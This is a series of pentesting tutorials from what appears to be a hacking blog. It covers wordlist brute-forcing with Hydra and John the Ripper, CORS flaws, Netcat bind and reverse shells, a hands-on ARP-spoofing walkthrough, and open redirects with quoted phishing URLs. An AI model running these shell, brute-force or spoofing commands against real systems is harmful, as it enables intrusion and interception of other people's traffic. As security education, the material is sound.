WORDS WORDS WORDS

Wordlists for when you’re at a loss for words

Before we jump right into it I want to take a second to define the what of wordlists are. Just to make sure everyone is on the same page. A wordlist (also known as a word list) as described by cambridge is “a list of words, especially when these words are collected for a particular purpose, for example words that someone has to learn, or words explained in a dictionary”. But for hackers a wordlist is less about learning something but testing something. Wordlists are normally a file with one “word” per-line that gets fed into an automated testing or repeating tool in order to break, crack, or circumvent a control. The most common versions of this is some form of enumeration or password cracking.

Why Do We Need Wordlists?

Alright, so why all the hype about wordlists? Think of wordlists as the Swiss Army knife in a pentester’s toolkit. These nifty collections of words, phrases, and passwords are crucial for a few key reasons:

Cracking Passwords Like a Pro

First up, wordlists are essential for cracking passwords. When you’re trying to break into a system (legally, of course!), one of the most common methods is a brute force attack. This is where you systematically try every possible password until you find the right one. But let’s face it, trying “123456” or “password” over and over manually is a drag. That’s where wordlists come in—they automate the process, making it faster and way more efficient.

Finding Vulnerabilities

Next, wordlists help you uncover hidden vulnerabilities. Imagine you’re testing a web application and you need to find all the hidden directories or files. By using a wordlist, you can automate the discovery process, checking thousands of possible URLs in a fraction of the time it would take to do it manually. It’s like having a treasure map, but instead of gold, you’re finding security holes.

Speeding Up Your Workflow

Efficiency is the name of the game in pentesting. Wordlists speed up your workflow by providing a ready-made list of potential passwords, usernames, URLs, and more. Instead of spending hours brainstorming or guessing, you can dive straight into the action. It’s like having a cheat sheet for hacking (again, ethically!).

Customization and Flexibility

Another cool thing about wordlists is that you can customize them. Depending on your target, you might need specific words or phrases. For example, if you’re pentesting a company, you might include terms related to their business, products, or employees. Custom wordlists tailored to your specific target can dramatically increase your success rate.

Staying One Step Ahead

Cybersecurity is all about staying one step ahead of the bad guys. By using wordlists, you’re employing the same tactics that many attackers use. This not only helps you find vulnerabilities before they do but also prepares you to defend against similar attacks. In a nutshell, wordlists are a pentester’s best friend. They make the tedious task of guessing passwords and finding vulnerabilities much more manageable, giving you the edge you need to secure systems effectively. So next time you’re setting up a test, don’t forget to bring along your trusty wordlist!

Examples of wordlists in action

When it comes to enumerating something not every case is as easy as an IDOR. You won’t be able to just increment or decrement the number in an API call or URL to find every object. Lets take a real world example of this with WordPress. In vanilla WordPress you can make an HTTP request https://WPSiteName.com/?author=1 and this will return the user associated with “userID” number one. By just increasing the number by one and repeating the process you can find all the users on the site. But what if you want to enumerate something that isn’t number based?

Sticking with the WordPress theme we will tackle the challenge of enumeration the plugins used by the site. Since WordPress has a well documented folder structure the Plugins are stored in the following path https://WPSiteName.com/wp-content/plugins but since the Plugins aren’t numbered like with the users you will have to know the names of each plugin that is installed (of course with older version of WP you can just look at the full like by hitting the /plugins directory but that isn’t the point of the example). If we give every plugin name to our wordlist and try each of them we should get back some examples of plugins that are on the site. Like in the case of the “Classic Editor” plugin shown below.

Wordlists by Tool Examples

Alright, now that we’ve got a handle on what wordlists are and why they’re super important, let’s dive into some hands-on action. Here, we’ll walk through a basic example of using a wordlist in a penetration test. Don’t worry, we’ll keep it simple and fun!

Step-by-Step: Cracking a Password with Hydra

Set Up Your Environment: Make sure you have Hydra installed. If you don’t have it yet, you can easily grab it with a quick command. Open up your terminal and type:

sudo apt-get install hydra

Choose Your Target: For this example, let’s say we’re trying to crack into an FTP server. We’ll need the target IP address and the username. For simplicity, let’s use:

  • IP address: 192.168.1.100
  • Username: admin

Grab a Wordlist: We’ll use the famous rockyou.txt wordlist. If you don’t already have it, you can find it online or in your Kali Linux distro. This wordlist contains millions of common passwords.

Run Hydra: Now, let’s put it all together. Fire up Hydra with the following command:

hydra -l admin -P /path/to/rockyou.txt ftp://192.168.1.100

Here’s what’s happening:

  • -l admin specifies the username.
  • -P /path/to/rockyou.txt points to our wordlist.
  • ftp://192.168.1.100 is the target service and IP.

Watch the Magic Happen: Hydra will start running, trying each password from the wordlist until it finds the right one or exhausts the list. Keep an eye on the terminal – once it hits the correct password, it’ll let you know.

Step-by-Step: Cracking a Password with John the Ripper

Set Up Your Environment: Make sure you have John the Ripper installed. You can install it with:

sudo apt-get install john

Get a Password Hash: Suppose you have a hashed password stored in a file called password.hash.

Prepare Your Wordlist: Again, we’ll use rockyou.txt for this example.

Run John the Ripper: Execute the following command to start cracking:

john --wordlist=/path/to/rockyou.txt password.hash

Here’s the breakdown:

  • --wordlist=/path/to/rockyou.txt specifies the wordlist.
  • password.hash is the file containing the password hash.

Check the Results: John will run through the wordlist and try to match the hash. You can view the cracked password with:

john --show password.hash

Building Your Own Wordlist.

Alright, so you’ve got the basics down, and now you’re ready to get your hands dirty and create your own wordlist. It’s like crafting a secret weapon tailor-made for your target. Here’s how you can get started:

Why Bother with Custom Wordlists?

You might be wondering, why not just use the pre-made ones? Well, custom wordlists can be a game-changer. They let you focus on specific targets, making your attacks more efficient and effective. Plus, it’s a lot of fun to see your custom list crack a tough nut.

Getting the Right Ingredients

Think of building a wordlist like cooking up a recipe. You need the right ingredients, and in this case, it’s all about collecting relevant words. Here are a few places to start:

Social Media Profiles: People love to share bits of their lives online. Check out their Facebook, Twitter, LinkedIn, and Instagram for potential keywords.

Company Websites: If you’re targeting a specific company, browse their official site. Look at employee bios, press releases, and blogs for potential words.

Forums and Communities: Dive into forums, Reddit threads, or community boards related to your target. People often use common jargon and phrases that can be gold for your list.

Scraping Tools: Use tools like CeWL (Custom Wordlist Generator) to automate the process. CeWL can crawl websites and generate a list of words based on the content it finds.

Crafting Your Masterpiece

Once you’ve gathered your words, it’s time to put them together. Here’s a simple process:

Organize Your Words: Keep things tidy. Group your words based on categories like names, places, common phrases, etc.

Use Wordlist Generators: Tools like Crunch can help you generate a list based on specific parameters (e.g., minimum and maximum length, character sets). This way, you can fine-tune your wordlist to be as broad or specific as you need.

Combine and Conquer: Mix and match your words. Combine names with dates, common phrases with variations, etc. For instance, if you have the word “Summer” and the year “2024,” you can create combinations like “Summer2024,” “2024Summer,” and so on.

Testing and Tweaking

Now, you’ve got your shiny new wordlist. But the job isn’t done yet. It’s crucial to test it and make adjustments. Here’s how:

Run a Test Attack: Use a tool like Hydra or John the Ripper with your wordlist to see how it performs. Start with an easy target to get a feel for its effectiveness.

Analyze and Adjust: If the list isn’t hitting the mark, go back and tweak it. Add new words, remove irrelevant ones, and refine your combinations.

Stay Updated: Keep your wordlist fresh. As new information comes in, update your list. This keeps you prepared for future tests.

A Few Tips to Keep in Mind

Optimize Your Wordlist: Sometimes, smaller, more targeted wordlists can be more effective than huge ones. Tailor your wordlist to your specific target if possible.

Use Multiple Tools: Different tools have different strengths. Hydra is great for online attacks, while John the Ripper excels with offline password cracking.

Stay Patient: Cracking passwords can take time, especially with complex passwords. Be patient and let the tools do their work.

Have Fun with It: Building a wordlist can be as creative as you want it to be. It’s about thinking outside the box and using your detective skills to gather the best possible words. So go ahead, experiment, and see what works best for you.

Further Reading

Alright, you’ve made it this far—awesome! Now let’s dive into some great resources to help you level up your wordlist game and pentesting skills.

Websites and Blogs:

Popular Wordlists:

  • SecLists: A collection of multiple types of lists used during security assessments.
  • Rockyou.txt: One of the most famous wordlists in the pentesting world. Great for brute force attacks.
  • Weakpass: A comprehensive collection of wordlists designed for password cracking.
  • Awesome Wordlists: A curated list of wordlists for bruteforcing and fuzzing
  • Wordlists by Krypton: A collection of wordlists for many different usages. They are sorted by their content.

Tools:

  • Crunch: A wordlist generator where you can specify a standard character set or a custom one.
  • CeWL: A custom wordlist generator that spiders a URL to create a wordlist of words that appear on the site.
  • John the Ripper: A fast password cracker with a large community and many wordlist options.

Books:

  • “The Web Application Hacker’s Handbook” by Dafydd Stuttard and Marcus Pinto: A must-read for anyone serious about web application security.
  • “Metasploit: The Penetration Tester’s Guide” by David Kennedy, Jim O’Gorman, Devon Kearns, and Mati Aharoni: Learn how to use Metasploit for real-world pentesting.
  • “Hacking: The Art of Exploitation” by Jon Erickson: Great for understanding the fundamentals of hacking and exploitation.

Communities and Forums:

  • Reddit: r/HowToHack: A friendly community for beginners and experts alike, sharing knowledge and experiences.

Tutorials and Courses:

  • Cybrary: Offers free courses on a wide range of cybersecurity topics.
  • Udemy: Look for courses on ethical hacking and pentesting.
  • TryHackMe: Hands-on learning paths and challenges for all levels of cybersecurity knowledge.

Learning CORS Is Not Difficult At All! You Just Need A Great Teacher!

What is Cross-Origin Resource Sharing

Cross-Origin Resource Sharing (CORS) is an HTTP-header-based mechanism that allows a server to indicate any origins (domain, scheme, or port) other than its own from which a browser should permit loading resources. CORS also relies on a mechanism by which browsers make a “preflight” request to the server hosting the cross-origin resource, in order to check that the server will permit the actual request. In that preflight, the browser sends headers that indicate the HTTP method and headers that will be used in the actual request.

For the sake of security, browsers started using a rule called Same-Origin Policy (SOP). A rule that is enforced at the browser level to control access to data between web applications. While SOP alone won’t stop XSS or CSRF it does help out. SOP restricts how a resource is loaded by one origin can interact with a resource from another origin.

Breaking Down Origins

For those that are unfamiliar with what an origin is, it consists of three parts. The schema (protocol), hostname (domain), and the port. Now, as long as these three are the same they pass SOP without incident. Below are a couple of scenarios to demonstrate this. For this, we will say the requests are being made from https://site.com:443

http://site.comDifferent scheme fails SOP
https://site.com/userSame Origin Passes SOP
https://a.site.comDifferent hostname fails SOP
https://site.com:8080Different port fails SOP

SOP examples

CORS Headers Settings

CORS is a mechanism that uses HTTP Headers to define Origins that are exempt from SOP. The two headers that are used are Access-Control-Allow-Origin and Access-Control-Allow-Credentials. Access-Control-Allow-Origin (ACAO) syntax has three options, a wildcard *, a single <origin>, or null.

  • *: any site is allowed to access resources
  • <origin>: allows a specific site to access resources
  • null: specifies if the origin is null allow resource access

ACAO header is only valid for publicly visible resources. For session/credential resources another header must be included.

Access-Control-Allow-Credentials allows cookies or other user credentials to be included in cross-origin requests. The only valid syntax for this header is true.

CORS Vulnerabilities

CORS vulnerabilities arise from misconfigurations of CORS. Since ACAO only allows one site or all sites settings developers must implement dynamic generation for multiple origin whitelisting. CORS misconfiguration is caused by flaws in the day dynamic generator for whitelisting is determined. Examples of flawed dynamic generation are as follows:

  • Reflected: The server just reflects the origin of the request without any other ruling. This is the same as setting ACAO to the * wildcard.
  • Parsing logic errors: If the dynamic generator checks if an origin started or ends with a value it is vulnerable. e.g. Check for bank.com. A bypass for starting with it would be using bank.com.evelcorp.com. The bypass for ending string matching would be evilcorpbank.com.
  • Whitelisted null Origin Value: This would be the same as setting the * wildcard but worse because ACAC can be set to true in this case.

Finding CORS Vulnerabilities

Finding CORS vulnerabilities are similar to any hacking process. Map the application. Check each request able path for CORS headers. Even if during normal browsing CORS headers are absent this could be due to dynamically generated CORS headers. Using something like burpsuite to change the origin could reveal the origin being reflected via the ACAO header. Checking for parsing logic is the next form of dynamic generation testing. See if you can determine a regex parsing that could be exploited from a malicious origin. And of course, you also have the null syntax to test for. If null or a vulnerable dynamic parser is present these are to see if ACAC is set to true.

When searching for CORS vulnerabilities check to see if you can change the protocol. Will the site let you make the same request with HTTP as with HTTPS? If so this can be leveraged with other attack vectors. Once a CORS vulnerability has been found review the site’s functionality to determine the impact of the finding.

Netcat Commands All You Need to Know

Netcat commands are designed to be a dependable back-end that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool. Since it can produce almost any kind of connection its user could need and has a number of built-in capabilities. Netcat is a versatile tool that has been dubbed the Hackers’ Swiss Army Knife. Netcat exists as both Linux and Windows binaries. The simplest way to think of Netcat is “a tool that can read and write to TCP and UDP ports.”

Connection to a TCP/UDP Port

Connecting to a TCP/UDP port can be useful in several situations:

  • Check if a port is open or closed
  • Read a banner from a port
  • Connect to a network service manually

Let’s say we want to see if port 110 is open to check if POP3 mail service is running. To do this we will run Netcat and have it try to connect by running the following command and see what we get back in response.

root@kali:~# nc -nv 10.0.0.16 110
(UNKOWN) [10.0.0.16] 110 (pop3) open

Netcat as Server and Client

Netcat can run as a server or as a client. This is one of the things that makes it such a useful tool. To start Netcat on your machine as a server all you have to do is supply the port number.

# Start Netcat as a listener
nc -nlvp 1337

Now that you have a system listing for a connection lets look at how to connect to it from another machine. To do this you will have to supply the same port number the listener is looking at but you also need to point over to the ip address.

# Connect to a ip and port as a client
nc -nv 10.0.0.22 1337

Netcat Commands: Different Types of Sessions

Netcat is a very ephemeral tool when it comes to sessions as the connections are very short lived. Now depending on the need and use that is a very good thing. But lets say for what ever reason you need it to be a little more solid. Maybe you want to be able to have multiple connections or you want to be able to reconnect after a previous session. We do this by using the -k argument. Keep in mind Netcat will throw an error if you try and use the -e argument in the same command.

# Force nc to listen for another connection after its current connection is closed
nc -nlvpk 1337

Netcat Commands: Bytes and File Transferring

Netcat can also be used to transfer files, both text and binary, from one computer to another. To send a file from a Linux machine to a Windows machine, we initiate a setup that is similar to the previous chat example, with some slight differences. On the Windows machine, we will set up a Netcat listener on port 1337 and redirect any incoming input into a file called input.exe.

# Server saving the sent file
C:\Users\Cody> nc -nlvp 1337 > input.exe

Now for the client machine we are going to send wget.exe to the Windows machine.

# Client sending the file
root@kali:~# nc -nv 10.0.0.16 1337 < /usr/share/windows-binaries/wget.exe
(UNKOWN) [10.0.0.16] 1337 (?) open

Don’t be alarmed since you won’t receive any feedback from Netcat about the file upload. While this example the file being small just wait a few seconds and then check if the file was uploaded. This can get nerve racking for larger things like log files. But data exfiltration of that level isn’t what Netcat is usually used for anyways. So lets get into one of the most useful features of Netcat. Binding shells.

Netcat Commands: Bind a shell

One of the most useful features of Netcat is its ability to do command redirections. Netcat can take an executable file and redirect the input, output, and error messages to a TCP/UDP port rather than the default console. For an example lets consider the cmd.exe executable. By redirecting the stdin, stdout, and stderr to the network, you can bind cmd.exe to a local port. Any connection to this port will be presented with a command prompt belonging to this computer. Lets run threw some scenarios to make sense of this ability. Lets say Bob (running Windows) has requested Alice’s assistance (running Linux) and has asked her to connect to his computer and issue some commands remotely. Bob has a public IP address, and is directly connected to the internet. Alice is behind a NAT’d connection, and has an internal IP address.

To get the help he needs Bob needs to bind cmd.exe to a TCP port on his public IP address, and ask Alice to connect to this particular IP and port. This can be done by the following Netcat commands.

C:\Users\Bob>nc -nlvp 4444 -e cmd.exe
listening on [any] 4444 ...

Netcat has bound TCP port 4444 to cmd.exe and will redirect any input, output, or error messages from cmd.exe to the network. Anyone connection to TCP port 4444 on Bob’s machine will be presented with Bob’s command prompt. This as you can guess is extremely dangerous to leave open long term. That is fine if you have a public IP for another to connect to but what if the roles where reversed?

Netcat Commands: Reverse Bind Shell

The Netcat commands for reversing a bind shell isn’t overly complicated. Using the same two people from the last example lets see what Alice can do to give Bob a shell. Alice cannot bind a port to /bin/bash locally on her computer and expect Bob to connect. She can send control of her command prompt to Bob’s machine, instead. This is known as a reverse shell. To get this working, Bob needs to setup Netcat to listen for an incoming shell.

C:\Users\Bob>nc -nlvp 4444
listening on [any] 4444 ...

Now to send the reverse shell command from Alice’s machine.

Alice@kail:~# nc -nv 10.0.0.16 4444 -e /bin/bash
(UNKNOWN) [10.0.0.16] 4444 (?) open

Once the connection is established, Alice’s Netcat will have redirected input, output, and error from /bin/bash, to Bob’s machine, on port 4444. If you’ve found this article about network manipulation feel free to check out this other post on arp-spoofing for more network hacking techniques.

How to Explain ARP Spoofing to Your Mom

ARP Spoofing also referred to as ARP Poisoning is a type of man in the middle attack. Where someone sits between a target (victim) and the router to listen in on the online traffic. This is a type of cyber attack carried out over a Local Area Network (LAN) that involves sending malicious ARP packets to a default gateway on a LAN in order to change the pairings in its IP to MAC address table. ARP Protocol translates IP addresses into MAC addresses. If any of that was unclear by the end of this post you will not only understand it but be able to demonstrate it. And as a bonus you will know how to protect yourself against these attacks.

How the Internet Transmits Data

Before diving into ARP spoofing, we have to take a second and understand the internet’s general communication systems. Don’t worry we will be getting into the fun stuff very shortly. Just want to make sure the why this attack works is understood first. The three things we are going to cover are Packets, MAC Addresses, and IP Addresses.

Packets

All information on the internet is transmitted via packets. Think of packets as packages that have data you need to send. And just like if you where to send a gift threw UPS you need to give them a few things. You have to give them the person it is going to and the address of the person. Think of it like the “TO” and “ADDRESS” on packages. Now that is only half the information though you still have to give them your name and address. Now where these values swap out is the “TO” and “FROM” use MAC addresses instead of peoples names. And the “ADDRESS” is filled with IP addresses.

Packets vs Packages

The last thing to touch on about packets is how they get moved around. They use routers to sort and forward all the packets. Packets make their way through the internet, traveling from router to router like packages travels from post office to post office. Now enough about packets lets move onto the next part MAC addresses.

MAC Addresses

All devices on a network contains something call a Network Interface Card (NIC). That means everything from you laptop to your cell phone has a NIC. Well to be honest everything that talks to the internet in some way has a NIC. So your gaming counsels to your smart fridge has a NIC. The need it so they can send packets as well as receive them. Because the NIC is what has the unique address of a MAC address. This is how the router can tell all the devices on the network apart from one another.

MAC addresses are normally 48-bit numbers written in hexadecimal (for example, AC:F6:F7:B2:AE:81). The first group of 3 numbers is a vendor specific number. So in our example AC:F6:F7 from the vendor LG Electronics. And the second group of 3 numbers is what ever the vendor wants to assign themselves. The make is so you don’t have two devices ending up with the same MAC address on your network. Because just imagine the headache of having two people with the same name living together. I’m looking at you people named Junior and Senior. Now onto the last part of packet identification IP addresses.

IP Addresses

I’m sure most of you are already aware of IP addresses and what they are. But just incase I’m going to cover them here real quick. IP addresses also identify machines on a network. But wait if that is true why do we need MAC addresses at all? Well, networks consist of hierarchical regions similarly to how countries are split into states or provinces. Which in turn have cites and towns. Now because of the limitations of available IP addresses not every device can be relied upon to use just IP addresses. An IPv4 address encodes the network hierarchy information in a 32-bit number. This number is typically represented in four sections separated by dots as in (192.168.3.1). IP addresses in the same region of this hierarchy also share the same upper-level bits. The further to the left of the IP address the higher in the bit.

Here is an example, all machines on the University of Virginia campus have IPv4 addresses like 128.143.***.***. You might also run into this written like 128.143.1.1/16, that is how a subclass is written using Classless Inter-Domain Routing (CIDR). But luckily you don’t need to know all that for now as subclass domains are a real monster to get your head around. At least is is for me anyways. All you need to know is because IP addresses follow a particular structure, routers can use parts of the IP address to decide how to route a packet through the hierarchy the most efficient way. And so with a mixture of subnet, IPs and MAC address you can use your devices easily.

What are ARP Tables

Now that the main internet topics have been covered you now have a better understanding of the juggling act that goes on every time a packet gets sent. Once a packet gets to the LAN the network uses the packet’s MAC address to determine the machine or device that it belongs to. But how does the router know what MAC address belongs to what IP address. Simple it sends something called an ARP query to all machines on the network. And the machines respond back with its MAC address. But if your router had to go threw that process every time it got a packet for sending and receiving, Netflix would still be a DVD rental business.

So if preforming that entire process of query and response to find a packets destination not to mention best route how do we speed it up? That’s right ARP tables to the rescue. Once the router gets a response from an ARP query it saves the response in this ARP table. By keeping track of this information it limits the number of times it needs to ask what IP has the packets MAC address.

To summarize what we covered so far MAC addresses identify who you are, IP addresses identify where you are and ARP tables keep track of the mapping.

ARP Spoofing Attacks Explained

Now that all the basic explanations are taken care of lets get to the fun stuff. An ARP spoofing attack consist of two steps. The first step is an attacker sends a fake ARP response to the victim, saying that the attacker’s device is the router for the LAN. This makes the victims systems think that all of their packets need to be passed to the attacker before getting to the where it needs to go. This is done because like the router devices have ARP tables so they don’t have to keep reaching out when they want to send something. The second step is when the attacker gets sent packets from the victim it then sends the packets over to the real LAN router. While you could just stop the traffic and not send it, this tactic wouldn’t be for much of a Man-in-the-middle (MITM) attack.

Now while that is all you need in order to preform an ARP Spoofing attack if you want to get your hands on even more data you are going to have to take extra steps. We are going to do the same steps as before but this time telling the router that you are the victim machine instead of telling the router you are the router. By doing this you get to see and send the responses of unencrypted packets. Now that we know what an ARP spoofing attack is lets get into the how.

Performing Your Own ARP Spoofing Attack

Before we perform an ARP spoofing attack lets make sure we have all the requirements covered. You are going to need dsniff, netdiscover, arpspoof, and urlsnarf. While these tools can be swapped out like changing dsniff for netcat or urlsnarf for wireshark they are the ones I’m going to use for this demonstration. I’m also going to be doing this on a Ubuntu system to show you don’t always need Kali for hacking (I still encourage everyone to check KALI our though). Before installing via apt-get always make sure to update regularly.

codebycody@TJOH:~$ sudo -i
codebycody@TJOH:~$ apt-get update
codebycody@TJOH:~$ apt-get install dsniff

Now we can start looking for devices to target on the network using netdiscover.
codebycody@TJOH:~$ netdiscover
Currently scanning: 172.27.139.0/16 | Screen View: Unique Host

27 Capptured ARP Req/Rep packets, from 15 hosts. Total size: 1534
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.0.1 08:02:8e:88:c3:cb 11 660 NETGEAR
192.168.0.3 e8:9f:80:7c:bd:2b 3 180 Unknown vender


The above you can see the response gave us back the MAC address of the router in this case a NETGEAR device, as well as a target. In order to allow your machine to preform port forwarding you have to set a flag for your system to look for. With Ubuntu and Kali you set this flag by running the command echo 1 > /proc/sys/net/ipv4/ip_forward. Now we can start ARP spoofing by running the following command arpspoofing -i eth0 -t <VICTIM_IP> <ROUTER_IP>. Just remember you need to run the command again but swapping the victim IP and the router IP. This will keep you in the middle for both out going and incoming responses. Now you can run urlsnarf to capture unencrypted packets being sent between the two devices as follows.
codebycody@TJOH:~$ urlsnarf -i eth0
urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128]
192.168.0.11 - - [14/Nov/2021:16:50:39 -0500] "GET http://thejoyofhacking.com/ HTTP/1.1" - - "-" "Mozilla/5.0 (Linux; Android 10; LM-G820) AppleWebkit/537.36 (KHTML, like Gecko) Chrom/95.0.4638.74 Mobile Safari/537.36

How to Protect Against ARP Spoofing Attacks

Although it’s difficult to prevent an ARP spoofing attack, encrypting your internet traffic helps protect your information from being stolen or modified. Any traffic sent over an HTTPS connection is encrypted. However, manually checking to ensure that every URL you visit uses HTTPS is tedious, so the Electronic Frontier Foundation (eff.org) has created a web browser extension (for Chrome, Edge, Firefox and Opera) called HTTPS Everywhere that ensures that all your web traffic goes over an HTTPS connection. Installing this plug-in is a great way to keep your friends, family and yourself safe against ARP spoofing.

What Are Open Redirect Vulnerabilities Explained

Lets get right into it and explain what an Open Redirect Vulnerability is. This vulnerability is when a target visits a website and that website sends their browser to a different URL, most often a different domain. This can be the result of a phishing attack or a stored value. This kind of sneaky redirecting can trick people into believing they’re submitting information on a valid website. But really they just gave their login creds to a malicious actor. That’s what an open redirect vulnerability is. Now in our current day and age it doesn’t sound that scary. And some companies view them as so low that rewards aren’t offered for them in bug bounties. Google being one case of this. OWASP, which is focused on web security removed open redirects from its top 10 way back in 2017.

How Redirects work

Open redirects occur when an application trusts user-controlled input to redirect to another site. Like in the case of a URL parameter, DOM window property, and/or HTML meta refresh tags. Redirects have a very valid use case in the world of websites when used as intended. Redirects are used when moving content to a new URL, when deleting pages or when changing domain names or merging websites. When you have to use them, make sure to follow these best practices: Avoid chained redirects: one redirect should not forward to another redirect. Below is an example of a redirect using the URL parameter.

https://www.google.com/?redirect=https://www.gmail.com

In this example you can see that the domain google is redirecting to the domain gmail. In this case you are getting what the developers where wanting. This same thing can be done with a php header redirect function so that it never gets to the chance to be manipulated. But sometimes it isn’t going to be a permanent redirection or the developers don’t have access to redirect something from the backend side. That is why javascript and HTML meta tags are used for redirects as well. Here are a couple of examples of what they look like.

JavaScript:
window.location = https://newurl.com/

HTML meta tag:
<html>
  <head>
    <meta http-equiv="refresh" content="0;URL=https://newurl.com/">
  </head>
</html>

What is so dangerous about Open Redirects

Now that we’ve covered what a redirect and an open redirect are lets get into the damage they’ve caused in the real world. Phishing is a major go to when abusing this vulnerability. Most email security solutions aren’t built to validate is a URL is malicious in real time. What they do is they have a list of bad URLs identified ahead of time. This is what happens to throw away URLs that threat actors use. Now keeping that in mind links created by threat actors have a short life span. But if they find an Open Redirect Vulnerability on a trusted website they can leverage the link longer.

Google’s DoubleClick

Google DoubleClick is the advertising technology that provides deep analytics and insights for marketers to more effectively advertise based on the behavior of users. DoubleClick has been known to maintain this security vulnerability dating back to 2008, following the acquisition by Google. Since then, the open redirect and the vulnerabilities this type of access poses has not been addressed. Even in 2014, a known malvertising campaign was identified using doubleclick.net.

The structure of the open redirects within the phishing campaigns identified by the GreatHorn Threat Intelligence Team are all similar, whereby the attacker adds in the “advertising URL” (seen as “adurl=”) to redirect the user to the destination site, that appears as a legitimate site, but in fact is malicious. To note, an attacker does not require a DoubleClick account to develop the redirect. Instead, anyone can modify a DoubleClick URL and change the redirect.

http://googleads.g.doubleclick.net/pcs/click?adurl=https%3A%2F%2Ftm74k.codesandbox.io/YnJlbnQucmFnc2RhbGVAY2hpY2stZmlsLWEuY29t&c=R,6,65f05392-f8de-4117-b270-51af0e396896E,&typo=4

Between Q1 2021 and Q2 2021, the use of Google’s DoubleClick platform to send malicious links increased 141%.

Google’s Meet

Google Meet teleconferencing is a highly used and recognized service, commonly used and included in any subscription to Google Workspace. In fact, during the 2020, Google reported over 100 million daily Meet meeting participants. And, because of the widespread use and trust associated with the #1 brand on the market, leveraging the option to apply an open redirect became a commonly used practice by threat actors. Between Q1 2021 and Q2 2021, the use of Google Meet platform to send malicious links increased 57%.

The structure of the open redirects within phishing campaigns are all similar, whereby the attacker adds in a “link redirect” (seen as “linkredirect?”) to tell the browser what destination site the user should go to. Unfortunately, using the domain of “meet.google.com/” appears as a legitimate site, but the destination site found after the “dest=” in the URL parameter is malicious.

https://meet.google.com/linkredirect?authuser=0&dest=https%3A%2F%2Fglowforge.chargebee.com%2Fsubscriptions%2F31441895%2Fdetails

Final thoughts

The difficulty of this attack is as simple as finding the redirecting functionality of a site. And in this day in age almost every site does it. While this type of attack doesn’t have much of an immediate impact on the company itself it can be damaging to the reputation of the company. Not to mention the headaches of getting a valid URL removed from a blacklist of know bad URLs. Besides validating all data before preforming an action (which should be done regardless) giving a simple popup saying the user is leaving the site is a simple warning to protect users.

How to get started with a bug bounty

First things first lets get right into what a bug bounty is. When a company or group wants to get real world pentesting of there application or system they start a program. These programs describe the rules of engagement so hackers can preform a pentest ethically. This in its simplest way a Bug Bounty. A bug bounty is different then a Vulnerability Disclosure Program (VDP). VDP is just the process or way a company lets security minded people submit finds they have discovered. One other main difference between the two is that a VDP rarely if ever will give the researcher any more then swag or hall of fame shout out. The swag being company type goodies like mugs and stickers. The hall of fame shout out will normally come with a link to a place of the researchers choice (github, twitter, or personal website).

Why would a company pay to get hacked

Now that we have covered what a bug bounty is why would a company want to spend money to have strangers attack their assets? Top reasons for this is that they get access to a vast pool of talent dedicated to finding the vulnerabilities the companies internal team missed. Believe it or not security isn’t seen as a value adding thing so a lot of places think security can be sprinkled on top instead of needing to be baked in from the beginning. But for companies that see the value they use bug bounties as a recruiting tool. So keep that in mind as you start your bug bounty journey once you get good its great part time cash that can lead to full time work.

What a company needs to start a bug bounty program

Before a company starts a bug bounty program they need to define a few things for the hackers.

  • What is the scope of the program:
    • This is the list of things in bounds of the program. Things that are included are eligible for monetary rewards they can be stuff such as what urls, OSI stack levels, specific functionalities.
  • What is the company focus:
    • What is the main thing the company is trying to get out of the program. At the end of the day they have a goal be it to harden a system or functionality. Clearly defining the goal will direct the most effort towards fulfilling the goal. If you want the payment gate way tested the most telling people will stop most from poking around the about us page.
  • Environment to test:
    • Is the program going to be run against the production site/servers or is it going to be a development/mirror site/server. When ever possible its best to use a mirror site/server that matches production as close as possible. Just using development assets might seem tempting it is going to be to unstable to be reliable tested against. The vulnerability might be the result of someone pushing a buggy feature that won’t make it to production. This also makes it harder to verify the vulnerability is valid.
  • What type of attacker is the company looking for:
    • This isn’t to say the company is looking for a hoodie wearing, energy drinking, black background green text hacker (But for the record all my terminals are just that and I won’t apologies). Companies need to focus on the threat actor they are worried about. The three main types are black hat, gray hat, and white hat. Knowing how much insider info to give a program is a very important question. If a white hat tester is needed then the program should be focused on invite programs only.
  • Should the program be invite only:
    • As mentioned in the last point invite only programs have benefits. The last example given was that a white hat needs a certain level of inside information/access to be successful. Invite programs can be literal invites on a person by person bases or on a set of criteria. The criteria being that a number of bug bounties have been done before, rating on vulnerabilities found in the past, or in some cases done special CTFs on a site.

Where to find these bug bounty programs

Now that you have a basic understanding of what a bug bounty program is and the use of it the benefits lets talk about where to find them. While you can check or contact a company directly to find out if they have a program in place the most common way is to join a bug bounty site like HackerOne. Below are a couple of of the top bug bounty platforms that are perfect for beginners and seasoned hackers looking for a side hustle.

HackerOne

You can earn cash hacking on bounty programs with this platform. Hackers have earned over $150 million through the HackerOne platform. HackerOne was started by hackers and security leaders who were driven by a passion to make the internet safer. Their platform is the industry standard for hacker-powered security. They partner with the global hacker community to surface the most relevant security issues that companies face before they can be exploited by criminals. HackerOne is headquartered in San Francisco with offices in London, New York City, Singapore, and the Netherlands.

Bugcrowd

Bugcrowd incentivizes uniquely-skilled hackers to continuously test companies critical targets and applications. Whether it’s a complex issue that’s flown under the radar, or something new introduced with the latest release, Bugcrowd has it covered. Bugcrowd’s global community of hackers have unique skills and perspectives needed to solve tough security challenges. Bugcrowd helped pay over $2 million to researchers for a Samsung Mobile reward program last year alone.

Hackenproof

They are part of Hacken Ecosystem, with products fueling cybersecurity industry from all sides: bug bounty platform, crypto exchange analytical ranking platform, cybersecurity conference HackIT, and a Cyber School. HackenProof is headquartered in Tallinn, Estonia with an R&D office in Kiev, Ukraine.

Final thoughts on how to be a great bug hunter

I’m going to wrap this up with a few words on what it takes to get to being a great bug hunter. Because practice makes perfect you are going to need to be practicing in between bug bounty programs. Subscribe to online resources like this very blog and practice the things you read and learn about. Setup a virtual machine as a cheap home lab to test things on. I’ve created a post all about virtual machines that you can check out here. As most of the bug bounty programs are related to web targets, the “The Web Application Hacker’s Handbook” is a must-read book. Watch tutorials and videos related to hacking. “Bug bounty Hunting Methodology v3 – Jason Haddix” is a great example. And above all be patient. It will take time to find your first valid bug. Duplicates are everywhere!

Testing Python Explained

Python Testing Why Should You Care

